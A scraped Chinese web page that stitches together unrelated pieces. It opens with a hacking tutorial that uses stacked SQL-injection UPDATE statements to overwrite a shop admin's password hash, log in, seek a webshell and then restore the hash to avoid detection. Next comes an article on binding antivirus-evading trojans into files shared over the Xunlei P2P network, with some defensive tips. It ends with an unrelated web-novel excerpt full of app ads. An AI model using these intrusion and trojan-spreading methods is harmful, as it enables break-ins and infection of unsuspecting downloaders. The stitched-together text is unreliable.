通过注射改管理员密码

　　注入点已经找到：http://xxx.***/book.asp?id=1996

　　我刚已经用NB检测过了。可以看到，存在表段shop_admin。

　　可是密码是MD5加密的：[adminid]:24[admin]:zhuyaod[password]:d4716077c2ba075c

　　那咋办？难道要跑密码？那得浪费多少时间和内存啊？

　　下面我来介绍一种新方法：注射。注射的语句如下：

　　;updateshop_adminsetpassword=’新MD5加密密码’wherepassword=’d4716077c2ba075c’--

　　比如，我需要把zhuyaod的密码改成wmmhacker，我们首先要先获得wmmhacker通过MD5加密后的十二

　　位密码

　　这里用明小子的工具就能转换了。wmmhacker-f8dc763194f29433

　　;updateshop_adminsetpassword=’f8dc763194f29433’wherepassword=’d4716077c2ba075c’--

　　我们来测试。看见了，页面没有返回错误，表示成功了。

　　现在我们对shop_admin表段下的密码做重新解猜。

　　[adminid]:24[admin]:zhuyaod[password]:f8dc763194f29433

　　大家对比一下，已经改变了。现在我们可以登陆了。

　　进来了。呵呵。就到这里了吧。值得提一句的是，我们进了后台，然后想办法拿到WEBSHELL。

　　接着，别忘了把管理员密码还原。不然他会发现滴！

　　;updateshop_adminsetpassword=’d4716077c2ba075c’wherepassword=’f8dc763194f29433’--

　　迅雷抓鸡实现方法与防范技巧

　　人世间最大的悲哀，莫过于人家正在害你，不知情的你还对他感恩戴德。这样荒唐的事情，只会在电视剧中出现吗?你想过自己也会变成那样吗?如果你不信，看完本文准让你大吃一惊!

　　迅雷抓鸡法最阴毒的就是它共享的捆绑文件令受害者无法产生警惕，反而会因为下载速度提升感到高兴。我们应该如何防范黑客用迅雷抓鸡呢?下面我们就来揭开谜底。

　　一、迅雷抓鸡太隐蔽了

　　由于迅雷使用的多资源超线程技术，从而构成独特的迅雷同享网络，在很多方面和P2P软件非常的相似。但迅雷是让用户将有效的重要消息共享到雷区，当用户下载某个文件信息的时候，迅雷会在雷区寻找相同的文件信息，从而有效地提高文件的下载速度。

　　本来这些措施是为了提高下载速度，但是该功能却引来了黑客的目光。黑客正是利用这样的共享，将捆绑有木马后门的文件共享，当用户下载该文件运行后就会被植入木马。

　　之所以会这样，因为雷区共享的资源很多，不会引起用户的注意。其次用户虽然可以不到不熟悉的网站下载，但是迅雷却做不到这一点。这样木马就鱼目混珠的混进来了。

　　二、迅雷抓鸡一点也不神奇

　　1.升级迅雷账号

　　黑客要用迅雷抓鸡，首先要拥有一个至少是“少校”级别的迅雷账号,这样才可以发布资源。怎么才能将账号信息升级到这样的级别呢?

　　根据迅雷官方的规定，注册用户(雷友)只需要登录在线1小时即可得2分，下载一个文件就可以得5分，注册用户在线时长得分每天封顶20分，下载文件得分每天封顶50分，这样就可以以每天70分的速度升级。

　　小提示：黑客也可能盗用他人的迅雷账号，这是最省事的方法。

　　2.捆绑免杀木马尒説书网

　　现在运行全新的捆绑工具EkChuah，首先点击“相关设置”中的“基本设置”选项，在“待合并文件”中设置插入的文件，也就是我们生成的下载者木马程序。接着在“宿主文件”设置被插入的文件选项，这里我们可以任意的选择一个常用的应用程序。

　　程序为提供了三种捆绑方式，这里选择“搜索多余空字节”，它是在程序中搜索内部存在的缝隙，尝试把文件分散插到缝隙中.再点击“高级设置”选项，这里的命令都是用于防止杀毒软件查杀，设置完后点击“开始合并”即可。

　　3.发布捆绑文件

　　捆绑文件完成后将它上传到任意网络空间中，接着我们再用迅雷下载。下载后，在下载列表里面，点击该文件链接中的“发布”按钮，会弹出一个文件介绍的“雷区”窗口。

　　当这迅雷网络检测到所需要的文件信息后，就会自动共享给其他正在下载该资源的计算机用户(例如《越狱》)，这样当文件运行以后我们的木马也就种植上了

　　三、想抓我没门

　　首先，不要从不了解的网站下载文件信息，即使是从自认为安全的网站下载的文件，下载完成后最好先验证文件的MD5码，以保证文件没有被其他人修改过。

　　小提示：一般网站下载会提供一个md5码，用户下载以后用MD5程序对下载的文件进行计算，如果得到的MD5相同就表示文件没有被修改。

　　其次，即安装最新版本的杀毒软件，并将病毒库更新到最新。这样当捆绑文件分解运行的时候，如果检测到病毒木马程序就会立即进行查杀，从而有效的保护系统的安全。

　　运行《网页木马拦截器》这款安全工具，该软件的功能和WindowsVista系统的UAC很相似。无论是捆绑木马还是用户运行的安全工具，再运行的时候都会进一步的提示用户加以确认

　　攻防博弈

　　攻黑客：文中用的方法比较巧妙，属于主动进攻型，比弄到迅雷博客里面，等人下载强多了。此外，还有一些更新更隐蔽的抓鸡方法，让人防不胜防!例如还可以自制一个图片传给受害者，当它被打开时，就开启了4444端口，然后我们可以远程控制受害者了。

　　防编辑：文件捆绑的确让人感到很棘手，我们可以先在虚拟机或影子系统中运行下载文件，等确安全后再在本地运行也不迟。至于特制图片入侵，我们只须将4444端口关闭并禁止通信即可。 有的人死了，但没有完全死……

　　无尽的昏迷过后，时宇猛地从床上起身。想要看最新章节内容，请下载爱阅小说app，无广告免费阅读最新章节内容。网站已经不更新最新章节内容，已经爱阅小说APP更新最新章节内容。

　　他大口的呼吸起新鲜的空气，胸口一颤一颤。

　　迷茫、不解，各种情绪涌上心头。

　　这是哪？

　　随后，时宇下意识观察四周，然后更茫然了。

　　一个单人宿舍？

　　就算他成功得到救援，现在也应该在病房才对。

　　还有自己的身体……怎么会一点伤也没有。

　　带着疑惑，时宇的视线快速从房间扫过，最终目光停留在了床头的一面镜子上。

　　镜子照出他现在的模样，大约十七八岁的年龄，外貌很帅。

　　可问题是，这不是他！下载爱阅小说app，阅读最新章节内容无广告免费

　　之前的自己，是一位二十多岁气宇不凡的帅气青年，工作有段时间了。

　　而现在，这相貌怎么看都只是高中生的年纪……

　　这个变化，让时宇发愣很久。

　　千万别告诉他，手术很成功……

　　身体、面貌都变了，这根本不是手术不手术的问题了，而是仙术。

　　他竟完全变成了另外一个人！

　　难道……是自己穿越了？

　　除了床头那摆放位置明显风水不好的镜子，时宇还在旁边发现了三本书。

　　时宇拿起一看，书名瞬间让他沉默。

　　《新手饲养员必备育兽手册》

　　《宠兽产后的护理》

　　《异种族兽耳娘评鉴指南》

　　时宇：？？？

　　前两本书的名字还算正常，最后一本你是怎么回事？

　　“咳。”

　　时宇目光一肃，伸出手来，不过很快手臂一僵。

　　就在他想翻开第三本书，看看这究竟是个什么东西时，他的大脑猛地一阵刺痛，大量的记忆如潮水般涌现。

　　冰原市。

　　宠兽饲养基地。

　　实习宠兽饲养员。网站即将关闭，下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术

　　御兽师？